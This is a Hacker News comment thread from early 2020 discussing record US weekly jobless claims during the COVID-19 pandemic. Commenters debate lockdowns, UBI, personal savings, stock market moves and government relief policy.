If the US was smart (big if...)

The pandemic quarantine will accumulate pent up demand, or at least a desire to consume once it is 'over'.

A good economic recovery would provide enough money to fund this demand and immediately reward rehiring of people to previous levels.

But this will be a series of discredited supply-side measures until (perhaps) a Keynesian friendly democrat is in office.

treyfitty(4266) 1 day ago [-]

Pent up demand for what? I'm being half facetious here, but something of this magnitude and rare will likely cause a shift in our world-views. This whole talk of "pent up demand" in Econ 101 really leads me to believe this system is guided by shibboleths and buzz phrases.

Let's be real for a second: this pandemic will fundamentally change consumption as we recalibrate just how much we "need" that new shiny thing.

big_chungus(2220) 2 days ago [-]

For this not to bankrupt the nation and retard our growth for the next twenty-five years, we need to all go back to work, today. Even if coronavirus kills a million people, the rest will probably be fine in the long term. If we shut down the economy, three hundred million will be affected. This 'flattening the curve' business is clearly not worth it.

You cannot shut the economy. There is only so much we can borrow. The fed is buying debt right and left, and the government surely doesn't want to borrow money and remove that liquidity. So, the fed will buy t-bills instead and probably have to inflate the currency to pay for it all. We could end up spending orders of magnitude than 2 trillion on more hand-outs, so we could end up with another period of stagflation. Unless we want to retard our growth and prosperity for the next 25 years, we all have to go back, consequences aside. Vulnerable people need to stay home for months until this blows over; it's not the responsibility of the rest of us to lose our jobs for the sake of a few others. Doctors say we have to stay home, but as doctors, they naturally want to prioritize health. As the saying goes, if you have a hammer, everything looks like a nail.

Like many other problems, there are diminishing returns as we approach either extreme of opening the economy or shutting it down. This extreme clearly isn't working. The at-risk million stay home; everyone else goes to work.

newhotelowner(10000) 2 days ago [-]

> The fed is buying debt right and left, and the government surely doesn't want to borrow money and remove that liquidity.

That's why the tax cut was a bad idea. It should have been a tax increase. We should be saving more in good times so that we have enough for the downturn.

If we had a safety net - like UBI, we wouldn't be spending 2 trillion.

Its time for UBI & some wealth distribution for proper prosperity and growth.

I paid $14 in federal taxes for every $100 I made in 2019. I am in top 1% earners in my state and nationwide. That is just ridiculous.

Kaze404(10000) 2 days ago [-]

One thing I don't understand about this line of thinking is how do you expect sick people from working? Sure, not everyone will die but a significant portion of the population will get infected and need at the very least to stay home for a week or two. How is that situation better than where we're at now?

Slartie(4249) 2 days ago [-]

How do you expect to 'motivate' people to just go to work, spend money in restaurants, fly around, take cruises...as if there was nothing going on, while at the same time millions of people are dying? Everyone is going to have someone in their family who dies because of this virus. And they're not going to die silently - you'll have crazy imagery of emergency rooms spilling over with patients circulating among the public. And I'm not speaking about 'media hype' - since this will hit all hospitals, people will just have to look left and right in their hometown to see the catastrophe evolving.

Are you going to plan to force people to take vacations, eat out, do their 'normal' stuff, while this is unfolding? Because without excessive force, nobody will do that. You'll have open businesses, but they won't have any customers for months while the above-described pans out. And probably for quite a while to come, because this event will rip a gaping wound into the conscience of the American people, probably larger than 9/11 did.

fallingfrog(4209) 2 days ago [-]

Things that Coronavirus is teaching us:

-the people who are actually vital to make the economy are grocery clerks, doctors, nurses, teachers and other carers, but not corporate CEOs, who are ultimately just dead weight.

-money is imaginary and they can print as much as they want.

-the people in power right now would rather have the stock market crash and watch you and a million other Americans die than give healthcare to everyone, even in the middle of a pandemic. How much would it help to have a centralized, organized response where everyone gets tested early right now? But it's impossible, because it would mean giving health care to poor people.

-capitalism is a beast that dies if it cannot grow. People work mostly to pay rent and debts. They pay rent so the landlord can pay the mortgage. The bank has already lent out the money they expect to get from people paying the mortgage- so if property owners don't pay their monthly bill, the whole financial system has a heart attack. Same thing with corporate debt. The corporation is assuming that you're going to buy crap you don't need. If you don't, then they can't pay their massive debts and again the whole system seizes up. So the primary reason we spend all our useful hours at work is so that we can make numbers bigger at the bank. And all of these debts, ultimately, are paid off on the backs of the working class. But the whole system can't be reduced, or paused, or even slowed down- it must grow exponentially more and more, consuming more and more resources forever, or else it craters in a devastating crash and cannibalizes itself on the way down.

smileysteve(10000) 2 days ago [-]

There are 2 policy options I see moving forward:

Public: Healthcare and Unemployment (possibly sick leave)

Private: Forced GAAP accounting for 2-4 weeks of sick leave for all employees (including gig contractors)

These would be paramount to national security; so could potentially receive backing loans or even the defense budget.

rchaud(10000) 2 days ago [-]

I'm not sure if the lessons will be interpreted in this way, or even remembered once things go back to some form of normalcy, at least for the monied classes that hold the largest microphones in our society.

The lessons learned from the conflict in Vietnam was not that 'war is a racket' or 'the US shouldn't militarily intervene unless it's a last resort'. It was simply that 'the US should use proxies where possible and only intervene where the opposition has a limited capacity to fight back'.

And even then, they've greatly overestimated their strength in these conflicts. Because the people with the largest microphones said it would be enough to win.

csomar(721) 2 days ago [-]

> A week ago, he said he had "a good middle-class job" which paid him $35.50 an hour plus health care and retirement benefits. Now he is struggling to figure out how he'll pay a $300 electric bill and $1,000 in rent for his townhouse. He also lost his health insurance.

You make $35.5/hour in (I suppose?) a stable job but if the work stops for a week, you struggle with a $300 bill? I know some people are living paycheck to paycheck but starting from a certain income you should build a safety net. What about your IRA? What about your credit score? What about small investments?

Looks like some people are living $ to $ without leaving any money aside. This might be what is going to make this even harder for the economy.

ithinkinstereo(10000) 2 days ago [-]

I went to my local 7-11 a couple of weeks ago to get some cash at the ATM. Next to it was a garbage bin for throwing away your receipt.

Out of curiosity, I went through about a dozen and not a single one had a balance above $1,000. Most were below $500.

There is little financial literacy in this country. Basic lessons about opening a bank account, the difference between checkings and savings, etc. is not something that is taught in K-12 nor in College. Let alone more 'advanced' topics like 401Ks and IRAs and investing in the stock market.

sodafountan(10000) 2 days ago [-]

Well here's the thing about that, people were actively incentivized not to save cash with low interest rates and a booming stock market. I know for myself personally I'm heavily invested in the markets just because that's what worked best for almost a decade. Nobody saw this coming.

Now you have to debate selling your stock at such low prices and realizes huge loses or paying your bills - I think most people are going to try to hold out for unemployment/use credit before they do that.

big_chungus(2220) 2 days ago [-]

This is exactly right. The economy has grown to unsustainable levels based on the economic habits of the average American who can't be bothered to save, hence the crash we're seeing now. At sixty hours a week, that guy should be making six figures, pre-tax. There is zero excuse for not saving. Everyone should save at least six months of salary for emergencies; though a few people legitimately can't, most Americans simply don't bother because they'd rather spend that money on the new i phone.

Edit: Williamdclt, I'll answer your question here due to rate-limiting.

Yes, lots of us do; I've been working that way since internships in high school. Same with many others I know. Usually, though, it's close to 12 hours a day and none on Saturday, or maybe 11 a day and a little on the weekend. Not an issue so long as you plan about an hour a day for something fun and mindless, and leave weekends free to do chores/relax.

Edit: Consz, responding here due to rate-limiting.

Not all of us live in the same world. I'm glad to hear you and your friends are doing well, but that's not representative of everyone. I do because I'm currently hourly, and that's true of many of the people I mentioned. When every additional hour worked has more money associated with it, most people will work more; that's not silly. The downside is, of course, there's a distinct opportunity cost to taking time off, so I don't do so much of that.

wmeredith(2833) 2 days ago [-]

60% of Millennials (basically people in their 30's) don't have enough saved for a $1000 emergency: https://www.cnbc.com/2018/12/19/60-percent-of-millennials-ca...

bagacrap(10000) 1 day ago [-]

yeah, not great, but the same thing has happened to many businesses. When they stop making money they can't meet their obligations (e.g. wages) and need a bailout a week later.

throwaway_USD(10000) 2 days ago [-]

Everyone should expect the stock market to thrive off this data today...

czbond(4312) 2 days ago [-]

I expect you are being facetious. The reason the market is up is a short squeeze.

generalpass(4226) 2 days ago [-]

> Everyone should expect the stock market to thrive off this data today...

There are too many huge announcements for anyone to claim they know why the (millions?) of individuals whose actions are reflected in market prices from noise.

treyfitty(4266) 2 days ago [-]

Why's that? I see that the SP500 is rising... but why is this "good news" for businesses?

abootstrapper(4325) 2 days ago [-]

And the stock market loves it? I'm so confused.

01100011(10000) 2 days ago [-]

It may be a temporary bump. I'm still debating pulling some money out of the market for a while. I'd still be buying via my 401(k), so I'm not totally out, but I just feel like the fundamentals will pull the market down for a while. Then again, we will probably, finally, start to see (stag|in)flation soon so having cash may be a bad move.

jostmey(2451) 2 days ago [-]

That's about 1% of the US population to put it in perspective

markvdb(4292) 2 days ago [-]

3.2810^6 people is 1.59% of the 20610^6 US working age population. [0]

For comparison, in my native Belgium, 18.38% of the working age population receive temporary jobless allowances due to corona [1].

[0] https://fred.stlouisfed.org/series/LFWA64TTUSM647S

[1]https://www.tijd.be/politiek-economie/belgie/federaal/overhe... (Sorry, Dutch language source only)

hyperbovine(4094) 2 days ago [-]

And a far higher percentage of the workforce.

helen___keller(10000) 2 days ago [-]

My biggest concern is that we aren't working on the infrastructure and cultural shift that is going to be needed to have a return to normal.

The endgame of covid-19 is herd immunity, which requires either 30-60% of the population infected and recovered, or it requires a vaccine. Realistically both are probably 9+ months out: vaccines are slow to develop, and almost every governor has proven they'd rather shut down everything than see hospitals be overloaded.

In other words, for the next 6-12 months we have two choices:

(a) Public life sees a boom-bust pattern of sickness, where we open things back up, then a new outbreak of infection happens, and everything shuts down again for 2-6 weeks.

(b) We aggressively fight off our initial outbreak, then build infrastructure to quickly identify and contain all infections. We gently reopen life back to a kind-of-normal states of permanent semi-quarantine until a vaccine arrives.

In my opinion, (b) is clearly the optimal approach. And yet we haven't even begun working on the infrastructural and cultural changes needed to support pre-herd-immunity public life.

We need mass production of face masks and a culture where it is unacceptable to not wear a face mask in public, particularly crowded locations and public transit.

We need every building, every bus and train, every tourist attraction, testing every visitor with a contactless thermometer. If you have a fever you get a covid-19 test.

To support allowing non-remote-capable work to resume, any jobs that are remote capable should remain remote until we have herd immunity. More people leaving their homes means higher risk of an outbreak, and when an outbreak happens non-remote-capable employees are the ones screwed over.

As much as I distrust the CCP and China's official numbers, it just takes one glance on the measures being taken in China to prove that China is a thousand times more serious about containing this virus than we are, and that's going to play in their favor in getting things back to normal. Here's an eye-opening video on some of the steps Nanjing has taken to prevent an outbreak:

https://www.youtube.com/watch?v=YfsdJGj3-jM&feature=youtu.be

The simple fact is we're lacking the national leadership to make an effective response to this disease.

bin0(4124) 2 days ago [-]

Cultural changes? How would you build those? The government doesn't control the culture. How would you make it unacceptable? Bureaucrats don't have direct control over that. Also, a bunch of 'we need's about the ideal situation don't do much.

The reason the China contained it is because she is an authoritarian state. While that provides certain advantages in this situation, it comes with certain drawbacks: not being able to access many websites, inability to express your political opinion, inability to own a firearm, being tossed in a concentration camp if the government doesn't like you. This isn't a question of leadership, you're asking the government to do things it literally has no power to do, things entirely outside of the constitution.

max93(4326) 2 days ago [-]

The stock rises after the announcement...

quickthrowman(10000) 2 days ago [-]

Yes, a higher unemployment number was expected. Did you think unemployment going way up wasn't already partially priced in?

1zael(10000) 2 days ago [-]

Welcome to the Great Depression of the 21st century.

asdfasgasdgasdg(10000) 2 days ago [-]

Things are bad enough without exaggerating the situation. The big problem with the great depression was not the size of the crash but the duration of the recovery. Our view of the money supply seems a bit more effective these days and it seems unlikely that the recession that comes out of this situation will last as long.

mensetmanusman(10000) 2 days ago [-]

A year from now, will we look back and say it was worth the suffering for something 5x as bad as the flu? (based on Germany's numbers, which are more fully accounting for those with mild symptoms)

Shows how important testing randomly is, if the denominator is low because you are only testing those in the hospital, it looks like the second coming of the Spanish flu.

graeme(2968) 2 days ago [-]

Germany hasn't reached health system overwhelm. When systems overwhelm, the death rate spikes. Both from corona and also from other causes that now can't be treated.

gnulinux(3609) 2 days ago [-]

Who cares if it's 5x the flu? I understand that you don't want to be proactive, but can you at least be reactive? Hospitals are already overwhelmed by COVID, and we're barely starting. It simply doesn't matter if it's 5x the flu, or 0.5x the flu. If it infects millions of people in a matter of weeks, since no one has immunity to this disease (unlike flu), it's gonna collapse the health system. Once the health system collapses, deaths will follow.

lm28469(10000) 2 days ago [-]

> based on Germany's numbers, which are more fully accounting for those with mild symptoms

It's only '5x' the flu (you say so, I didn't look it up) BECAUSE everything is locked down. If we continued to live and work as usual hospitals would be overcrowded (they already are in italy, spain and some parts of france), which means a bicycle accident, a car crash, a bad fall = you'd die because no one could take care of you. In Italy they had to call the army to get more body bags and more people to carry the dead out, NY is already running out of space to store dead people.

You can't just look at low numbers due to aggressive lock downs, project them in your imaginary world and draw conclusions while ignoring all the side effects.

matwood(10000) 2 days ago [-]

Even if we raise the denominator to make the percentages look better, there is no denying that hospitals are being overwhelmed. The flu often already pushed hospitals to the edge, so even only (heh) 5x worse will cause most hospital systems collapse.

treyfitty(4266) 2 days ago [-]

For context, the previous record was ~680K in the early 1980s.

allcentury(10000) 2 days ago [-]

Also worth noting the population then was 231 million, of which 110 million was in the labor force.

So today: 3 mil / 160 mil - 1.9%

1982: 670k / 110 mil - 0.6%

bearjaws(10000) 2 days ago [-]

Anecdotal but my company is hiring 2x support and 2x QA, yesterday alone we went from receiving 5-10 applicants a day to 53. I just got into work and there is already 21 from last night.

castratikron(10000) 2 days ago [-]

Just curious, did your company get an essential business exemption from any stay at home orders?

dubcanada(4144) 2 days ago [-]

Canada is at 1 million or about 5% of our population. And it's only going to go up from here.

I have no idea how they are doing to handle any of this, having that percentage of your population on EI is going to hurt.

nahname(3891) 2 days ago [-]

Have heard similar estimates, found an article corroborating this.

https://www.theglobeandmail.com/business/article-unemploymen...

wpietri(3461) 2 days ago [-]

And as an econ/business reporter points out, this should be seen as the lower bound on the true number of lost job, because there are a lot of reasons people didn't file, including confusion, overwhelmed systems, and many lost jobs not qualifying: https://twitter.com/bencasselman/status/1243147516784324608

toomuchtodo(1510) 2 days ago [-]

This is also only the beginning, as lockdowns across the nation aren't in full swing yet.

notyourday(4316) 2 days ago [-]

It is going to be much worse.

This is the first week when the managers/companies started to pay attention to what is happening.

Small companies are going to lay people off this week/next week. Mass layoffs take time as a lot of states have something like a WARN act.

One should also remember that most of tipped restaurant industry gets tips on credit cards which are included in the next weekly/bi-weekly paychecks, which means people had money coming the week of lock down/last week. It is this weeek/next week's paychecks will have nothing in them.

Here's how you know we are starting to accept reality: Uber and Lyft miss the revenue numbers; at least one of the on demand delivery services abruptly closes. Ordering food at the markups of DoorDash/Postmates/UberEats/Grubhub is denial.

est31(3611) 2 days ago [-]

To make it sure that I understand it correctly: this is not the total number of unemployed people, but the number of people who became unemployed recently and now file the forms? Then that number is gigantic, wow.

johnpowell(4332) 2 days ago [-]

This is the number of people that filed for unemployment in the last week. A staggering number. Just seven days of data.

skrowl(4188) 2 days ago [-]

The USA is home to ~340 million people (many people here illegally aren't counted). Only about 63.4% (~215M) of them work.

https://tradingeconomics.com/united-states/labor-force-parti...

ian0(3674) 2 days ago [-]

How is our social system so fragile?

I mean seriously - thousands of years and wireless comms and rockets to the moon and not only do we forget to prepare for a virus (something that had happened routinely throughout our history) but when it hits and people have to stay at home for a few weeks the economy falls down and leaves millions of people who want to work unable to do so.

TeMPOraL(2761) 2 days ago [-]

It's just the consequence of market economy. Everyone is under pressure to 'cut out fat', make themselves 'lean'. That applies everywhere across the supply chain. First thing that goes is every redundancy, buffer and spare capacity - things that would mitigate a crisis like this. It's because the companies that 'cut out fat' can grow faster, sell cheaper and profit more, compared to their competitors that have risk horizons longer than few months.

What needs to be done is legally mandated buffers and redundancies (so that no one can gain a competitive advantage by omitting or removing them). Many countries had that after II World War. Unfortunately, out of the wood works came people screaming 'efficiency!' and cut it all out.

cloverich(10000) 2 days ago [-]

Because people previously (falsely) believed it could not happen in the US, with the last true pandemic being so far in the past. The Bill Gates TED talk from 2016 shows that some people understood what we should have done, but it involves not only changing minds but also putting money into it. Whatever the total fallout from this pandemic, I expect the creation of a medical reserve (as suggested in the talk) is one that will certainly happen.

wmeredith(2833) 2 days ago [-]

This is hubris talking. Nature can humble us at any time and we can do little-to-nothing nothing about it. Not to say we shouldn't try. But humanity vs the worst things that the environment can dish out–super volcanoes, asteroids, super bugs–isn't really a contest at all. CoVID-19 isn't even an extinction level event.

lossolo(3951) 2 days ago [-]

> thousands of years and wireless comms and rockets to the moon

Every society is three meals away from chaos.

lonelappde(10000) 2 days ago [-]

Rare catastrophes are hard to prepare for, because the cost of preparation is expensive.

'Routinely happening' once a century or two isn't an easy target.

abyssin(10000) 2 days ago [-]

Don't even start to think about climate change, a phenomenon we're completely aware is happening, but still do nothing about, despite consequences that will be worse than this virus.

minikites(2229) 2 days ago [-]

'My goal is to cut government in half in twenty-five years, to get it down to the size where we can drown it in the bathtub.'

NamTaf(4318) 2 days ago [-]

3.28 million? Really?

With the lockdowns of retail, hospitality, etc. in Australia, a country of 25 million total, we've seen nearly something north of 800,000 unemployed (temporarily or permanently). This can't be an accurate figure, surely!

nhumrich(4206) 2 days ago [-]

Your number actually makes the number sound more reasonable. 800k of 25 million is about 3%. 3 million of US population of 300million is 1%.

rchaud(10000) 2 days ago [-]

> in Australia, a country of 25 million total

The US has 13x-15x the population of Australia, so the numbers will be larger. In any case, these are the claims filed in the past week only, and not a cumulative count of the total number who are currently unemployed.

jeltz(4168) 2 days ago [-]

This is just the people who have filed last week. There is bound to be many more soon. And I am not sure everyone who have lost their jobs are eligible.

lettergram(1405) 2 days ago [-]

And this is only the beginning... if you look for projections (or run your own [1]), we will need a hard nationwide shutdown for at least 2-3 months (not 2 weeks) for this to not kill a million plus Americans.

I suspect even if a shutdown is lifted, when people start seeing body counts it's not like they'll return to traveling or eating out.

We'd probably need to see an anti-body test first and/or vaccine. This is going to take years to recover from.

[1] https://austingwalters.com/covid-19-vs-the-economy/

Slartie(4249) 2 days ago [-]

Well, the antibody tests are coming in a matter of weeks - multiple approaches have already been developed and they are currently being validated, that is, checked if they trigger reliably on the Coronavirus antibodies and ONLY on those and not similar ones (source: Charité Berlin - the virology lab there is on the forefront of developing Coronavirus tests and assists in validating new antibody tests).

They will allow us to make large randomized studies in the population and finally determine the 'real' percentage of people who can be considered immune, which is the key element currently missing in all projection models. Having that data, more realistic projections can be made as to how fast the virus will resume to spread if we lift specific restrictions. At the moment, we can only hope for this number to be far larger than expected.

But doing such studies takes time, and without their results, lifting any of the restrictions is going to be a dangerous gamble with public health. So I would also suspect for most restrictions to stay in place for about 2 months, and then maybe a slow and gradual opening. First schools, then essential day-to-day businesses, and travel/leisure stuff last.

However, antibody tests are not a substitute for a vaccine. Only a broadly available vaccine will give people enough confidence of not contracting the disease for them to start living a normal life again. We can't expect any kind of normality in the economy until this happens, regardless of whether 'America (or any other country) is opened for business' again or not - because an open business is worth nothing if the customers stay away.

AznHisoka(3087) 2 days ago [-]

other countries are also facing this crisis in different stages. So traveling won't be back to normal for a long time.

duxup(4060) 2 days ago [-]

Semi tangent, about dealing with mass unemployment.

I like to think this event changes people's perspective on folks out of work in the US. There's a lot of recrimination, and even self loathing about being poor or out of work in the US. It doesn't seem based in reality and certainly isn't helpful.

Perhaps it is time we realize that much like a pandemic things in this world change fast and we need to be able to help folks who are out of work pick up skills quickly / retrain (and maybe retrain employers that people with a 'different' resume might actually be able to do other jobs) so that they can get back on their feet.

Maybe it won't be a pandemic but things are changing fast whole industries of people find themselves offshored, jobs change, etc. I think we need to plan for / get comfortable with the idea that on a smaller scale we should be ready to deal with such things dynamically over the course of people's lives with retraining, support for it, and etc. And maybe a workforce with a variety of experiences will be better for it.

draw_down(10000) 2 days ago [-]

Saying things like 'maybe we need to realize that...' and so on is nice, and important. But unless things change materially it won't do much. People need leniency, but they need it in more than just the disposition of those around them. They need leniency on rent, they need money to live. These are material needs.

Yesterday, a small group of senators threatened to hold up the bill that offers (pitiful, way too little) relief to workers. They did this because they were concerned the government would be giving too much to workers, such that people would begin choosing not to work.

It's (hopefully) clear that this is plainly ridiculous, and evil behavior. I don't bring it up to say those people are horrible - which they are. I bring it up to point out that this is the ideology and the environment we have to contend with.

People need help but our system is intentionally designed not to give it to them.

dragonwriter(4341) 2 days ago [-]

> I like to think this event changes people's perspective on folks out of work in the US.

Sure, just like the Depression did.

And just like the Depression, a few years of boom times afterwards and that effect will be negated until the next similar event.

jimbokun(4154) 2 days ago [-]

Reading your post made Andrew Yang's voice pop into my head:

'And do you know what would really help those people while they retrain for new jobs? A thousand bucks a month!'

gonzo41(10000) 2 days ago [-]

In Australia, they closed all the 'non-essential' industries. Which turns out to be about 30% of the workforce. I keep thinking that big shift will be when people come out of this they won't allow themselves to be 'non-essential' ever again. They won't take back those jobs, they'll push for agreements that guarantee a safety net.

vikramkr(10000) 2 days ago [-]

I'm more cynical - it's very easy to justify losing your job now as driven by external factors while losing your job before as being due to an internal failing. If people get their jobs back within the next few months, I think it could breed a sense of superiority of 'I got my job back with the Coronavirus, and you couldn't even get a job in one of the biggest boom markets ever.' there's no basis in reality for looking down on the poor like you said, and I don't know if this shock will force people to really understand reality as you hope, or simply by the basis of a new false understanding as I fear.

sizzle(749) 1 day ago [-]

I can't help but draw a parallel to how machine learning and A.I. automation is supposed to disrupt a majority of blue collar jobs and if this is a taste of what is to come when we crack the code and people's skills are rendered obsolete to specialized sophisticated machinery that outperforms us in every metric and runs autonomously 24/7.

I also think about universal basic income and what life would feel like if I suddenly was left to my own devices and had the luxury to learn any subject I wanted, pursue new hobbies and crafts without dragging myself into work with stop and go traffic both ways, zapping my creative energy and making me a more jaded person day by day and the week progresses.

cloverich(10000) 2 days ago [-]

Frankly we have a formal education system that is actively hostile to training people to do jobs, and instead teaches 'fundamentals' and 'how to learn'. There's tremendous support for those concepts, though I personally consider them bogus. If we truly want cross trained people, the education system is the one that needs to change. Otherwise the funding and time that could be used for jobs training will always be soaked up by it. My humble opinion.

I know its not a popular opinion, but when I see my Nanny wanting to get ahead by taking night classes, and those classes have her studying and writing 19th century poetry... I can't help but feel deeply frustrated by the disconnect. How could she possibly stay motivated to finish school, when its only giving her hoops to jump through and no practical skills to get into a better job? How could I convince her to e.g. take programming lessons from me, when society and her parents are telling her a college degree (that, at this rate, she'll unlikely obtain) is what will help her most? /rant

dpcan(4250) 2 days ago [-]

Being a sole proprietor / contractor right now feels hopeless. Nobody is spending money with me right now, projects on hold, no possible way of filing for unemployment. It's worrisome.

Thankfully my wife is still working - but she's an administrator at a Nursing Home and people there are starting to get tested - and she's panicking. They are days from having no nurses. She's worried about cleaning crews being sick. She's worried about bringing it home. Luckily they have a stockpile of supplies, BUT THIS WHOLE THING IS ABOUT TO BLOW UP!

The problem is that the tests of their employees are taking UP TO 10 DAYS to come back. They are sending home nurses for this long just to wait and see if they are all going to be exposed, their residents too.

Anyone in their facility who may be sick is being sent home for 14 days. There will be nobody left to take care of the elderly, who may also get sick.

People are worried about dying themselves, or the people they care for dying.

I'm confident we are 10 days from hearing about Nursing Homes and Nurses in Nursing Homes everywhere getting sick and dying in massive numbers.

cheeze(10000) 2 days ago [-]

> Being a sole proprietor / contractor right now feels hopeless. Nobody is spending money with me right now, projects on hold, no possible way of filing for unemployment. It's worrisome.

Please don't take this as me being captain hindsight here, but I think that this pandemic has reallllly shown the need for an emergency fund. IMO if you're sole prop or contractor, you owe it to yourself to have a bigger emergency fund for this exact scenario.

vsareto(4247) 2 days ago [-]

I don't think you'll be hearing much about nursing homes: https://arstechnica.com/tech-policy/2020/03/feds-decline-to-...

avalys(10000) 2 days ago [-]

Check out the details of the small business forgivable loan package just passed by the Senate. I think they took some actions to help sole proprietors and self-employed people also.

PaulRobinson(4079) 2 days ago [-]

A staggering number, and unprecedented in the modern era.

I'm not in the US or an America, but my (retired), Father is and for the sake of the people around him and his family I hope this is the point where the American political system - and Republicans in particular - realise that their ideologies are dead.

In the UK we saw an Old-Etonian Tory Prime Minister in the space of a couple of weeks:

- Effectively nationalise a huge chunk of private industry by offering to subsidise 80% of all salaries up to £30k/year

- Delay tax payments for businesses, and offer up to 15% of GDP in loans and grants to help keep them alive

- Renationalise the train industry (privatising it and others was a hallmark of Thatcher's period in power)

- Accept that their planned immigration policy post-Brexit is now probably dead in the water because who knew that 'low skilled workers' like cleaners and agricultural workers would be useful?

- Severely curtail free movement and enterprise by shutting every pub, restaurant, cinema, theatre and cafe across the UK as well as almost every shop that isn't a pharmacy or food shop

- Become champion supporters of an NHS they were - until recently - trying to sell bit off of

Politics here has changed forever, and likely for the better (assuming the sanctions on free movement and enterprise are temporary and not a back door for more draconian measures). For the sake of the most vulnerable in America, I hope it's the same there too.

And maybe - just maybe - it's time everybody took another look at the UBI debate, again.

gadders(770) 2 days ago [-]

>> - Become champion supporters of an NHS they were - until recently - trying to sell bit off of

No evidence for this whatsoever, but is just the usual Labour dog-whistle claim against every Tory govenment.

9nGQluzmnq3M(2694) 2 days ago [-]

> Politics here has changed forever

Unlikely. I think we'll be back to business as usual (at least on the political side) within a year of the end of the pandemic.

I'm also afraid that this is going to be a major setback not just for Europe but globalization in general, which will leave us all worse off in the long run.

string(10000) 2 days ago [-]

Can you keep the comments like this on Reddit and away from HN, please?

For the non-UK users reading this: almost all of the bullet pointed statements are either incorrect or exaggerated.

wmeredith(2833) 2 days ago [-]

> and Republicans in particular - realise that their ideologies are dead

Good luck. Their base doesn't care. I was speaking with my father a couple days ago, who is a US Board-Certified surgeon and ran his own practice for 40 years. He's a smart guy, but firmly lives in the Fox News/Rush Limbaugh bubble. He was saying how he was hoping this crisis would put the final nail in the coffin ... for the corrupt democrats. It's insanity.

j4kp07(10000) 2 days ago [-]

> Republicans in particular

It was the Democrats that held this up for carbon emmission and diversity standards and to game the upcoming elections in November.

> I'm not in the US or an American...

Of course.

TMWNN(4190) 2 days ago [-]

>- Become champion supporters of an NHS they were - until recently - trying to sell bit off of

Private Eye on '24 Hours to Save the NHS https://twitter.com/KulganofCrydee/status/833654730849136641

switch007(10000) 2 days ago [-]

> - Renationalise the train industry

That's not quite what's happening. https://www.railwaygazette.com/uk/uk-train-operators-offered...

sago(4337) 2 days ago [-]

Sadly I think the effect might be the opposite. The massive financial hardship seems poised for a backlash where a group promoting 'economy above all else' will gain the support of millions who feel their financial future has been unfairly taken.

I see little threads fraying already.

I have heard even normally fairly left-leaning people saying variations of 'this will kill more people from poverty'.

simonswords82(2945) 2 days ago [-]

Hi Paul, epic post - and so true.

I was watching CNN last night with my Canadian wife (I'm English) and I couldn't believe the BS being thrown around when all we really want to see from the USA is concrete action like what many other nations including the UK has achieved.

Saw your tweet about boycotting companies btw, you'll like this: http://www.whencovidisover.co.uk/

shripadk(4157) 2 days ago [-]

> And maybe - just maybe - it's time everybody took another look at the UBI debate, again.

Doesn't UBI directly result in inflation and cause currency devaluation? If the money that you hold loses its value (because everyone has at the very least the same amount of money as a basic, consistent income) then it is worth nothing in the end. It is as good as having no money in my humble opinion. Money has to be valuable for it to be useful in trade. Giving away money to everyone devalues the currency.

mtberatwork(3613) 2 days ago [-]

I would like to be optimistic and think we all learn valuable lessons from this but realistically most people will just double-down in their convictions and blame some other externality as to why their own political/economic ideologies didn't pan out.

martinald(3981) 2 days ago [-]

Minor point - Rail industry was privatised by John Major. Thatcher was against or at least indifferent to privatising it.

stupandaus(3560) 2 days ago [-]

A few things to note:

1. These figures are only new claims as of 3/21, so the numbers will get worse.

2. This is ~2% of the estimated ~160-165M US Workforce.

3. This is nearly 5x (!) the prior record of 671K new jobless claims from 1982, and redefines the scale for jobless claims. [1]

4. This does not account for the countless gig workers that are part of the modern economy that likely did not file for unemployment since they were not covered prior to the passing of the senate bill last night.

This goes to show just how sharp of an impact the coronavirus pandemic has had relative to past recessions. Even the '08 Financial Crisis took MONTHS to unravel.

[1] https://fred.stlouisfed.org/series/ICSA

neycoda(10000) 1 day ago [-]

This goes to show how negatively-impacting ignoring health officials is.

nck4222(4341) 2 days ago [-]

>4. This does not account for the countless gig workers that are part of the modern economy that likely did not file for unemployment since they were not covered prior to the passing of the senate bill last night.

You (and others) are probably aware, but worth pointing out that these people still can not currently file for unemployment benefits until the house passes the bill, the senate approves any house amendments to the bill, and the president signs the bill.

The house isn't voting on this until tomorrow at the earliest, so there's still a ways to go.

There's probably others as well that have had their pay reduced, that are waiting to see what's going to be passed before filing for benefits. Anecdotally I know of some software engineers in this boat.

pc86(4003) 2 days ago [-]

2008 took months to unravel because of the nature of the crisis. Foreclosure is a process and in some areas can take up to 6 months or more from the time you stop paying your mortgage.

Here we had state governments practically shutting down their economies overnight. Overnight, every restaurant in my state was no longer allowed to have dine in. Only maybe half in my local area stayed open for carryout, and at least 80% of those have closed in the few weeks since.

The speed at which this happened is astronomical, but that doesn't necessarily mean that it's going to be multiple times worse than 2008. Just that the onset was very quick.

pengaru(10000) 2 days ago [-]

> 3. This is nearly 5x (!) the prior record of 671K new jobless claims from 1982, and redefines the scale for jobless claims. [1]

This should be normalized to be per-capita, comparing absolute figures is distorted by population growth. The US was only 230M people in 1982, 100M less than today.

After normalizing it's more like 3.9x.

sct202(10000) 2 days ago [-]

I definitely know more people laid off this week than last week. No one was really sure how much business they could sustain with this whole thing going on, and now that there's been a full week and a partial week employers are starting to pull the plug.

luma(10000) 2 days ago [-]

Further, unemployment benefits are managed by the states, and those states are running web services which typically see a few hundred hits a day. They are now trying to process tens of thousands of new records each day, and at least in MI the service is absolutely not up to the task.

My wife managed to get her filing completed a little after 1am this morning. She was the only one of her 20 coworkers to successfully file, the rest are continuing to attempt to get the state web site to work today, while more people pile in.

These numbers are going to get much, much worse.

rixrax(4255) 2 days ago [-]

And yet DJIA is up almost 1000 points. Is this the stimulus $$$ in work, or what is going on here?

cableshaft(4320) 2 days ago [-]

Also doesn't take into account those who have had reduced hours or salary at their jobs, like my wife's entire company (at least the employees that didn't get furloughed at her company). She got reduced to 3 days a week, for a 40% salary reduction.

mikorym(4263) 2 days ago [-]

Not from the US, so not quite in phase with how things work. What can this tell us about actual unemployment and actual people that won't have a job now (short, medium or forever)?

claudeganon(3646) 2 days ago [-]

> This goes to show just how sharp of an impact the coronavirus pandemic has had relative to past recessions. Even the '08 Financial Crisis took MONTHS to unravel.

I think we need to couple the two events a little more closely. The 2008 Financial Crisis accelerated inequality, political instability, asset inflation, and the rise of precarious work to such a degree that the damage of this hit is being greatly compounded.

To my mind, the hole that was the 2008 crisis was papered over and someone just came by and dropped a brick on it.

wil421(4130) 2 days ago [-]

The financial crisis didn't prevent most people from spending money on entertainment or eating out. People scaled back spending or went to cheaper places.

People are fearful and a lot of folks are supposed to be sheltering in place. Business are being told to do takeout only which is a huge difference.

